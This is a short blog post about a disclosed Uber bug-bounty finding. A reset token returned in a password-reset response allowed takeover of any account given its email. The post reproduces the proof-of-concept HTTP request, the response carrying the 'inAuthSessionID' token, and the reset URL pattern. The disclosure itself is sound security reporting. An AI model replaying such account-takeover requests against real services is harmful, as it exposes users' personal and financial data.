UBER Authentication Vulnerability found

  • 0
UBER Authentication Vulnerability found

UBER Authentication Vulnerability found

Category : Blog

UBER Authentication Vulnerability found that allows anyone to change anyone’s Uber account password without any authentication. Vincenzo C., an Italian security expert who is popular on Twitter as @Procode701, has discovered a critical Authentication Vulnerability in UBER  by which anyone can reset the password for any account.

The company held the Bug Bounty program which was operated by Hackerone where the researcher found the ‘Improper Authentication’ vulnerability.

UBER Authentication Vulnerability found “With an email address for a valid Uber account, it was possible to take over that account because the reset token was exposed in the response of a password reset HTTP request. This meant an attacker could initiate password reset for an account and immediately receive the reset token for that account”, explained by the UBER.

“We consider the security of our user’s data top priority, so we were very interested in this report. Furthermore, @procode701 was a pleasure to work with and we look forward to more reports in the future.”

The vulnerability in the reset password could be exploited to generate an authentication token “inAuthSessionID”, and then anyone could use this to change the password for any account found out by the security expert.

Here is the UBER Improper Authentication flaw,

To change the password for any account you just need to obtain a session token “inAuthSessionID” and then using the standard link that is present in the change password form you can easily change the password.
https://auth.uber.com/login/stage/PASTE SESSION ID <— inAuthSessionID generated through the chaneg password email  /af9b9d0c-bb98-41de-876c-4cb911c79bd1 <– tokenID with no expiration date.
POST /login/handleanswer HTTP/1.1
Host: auth.uber.com
{ “init”: false,
“answer”: {
“type”: “PASSWORD_RESET_WITH_EMAIL”,
“userIdentifier”: {
“email”: “xxxx@uber.com”
}
}
}
Reply
HTTP/1.1 200 OK

{
“inAuthSessionID”: “cdc1a741-0a8b-4356-8995-8388ab4bbf28”,
“stage”: {
“question”: {
“signinToken”: “”,
“type”: “VERIFY_PASSWORD_RESET”,
“tripChallenges”: []
},
“alternatives”: []
}
}

The effect of the vulnerability is very critical. It allow a hackers to access any account and any user’s personal data ( ID Card, banking data, Driver License), including financial one.


Leave a Reply

Show Buttons
Hide Buttons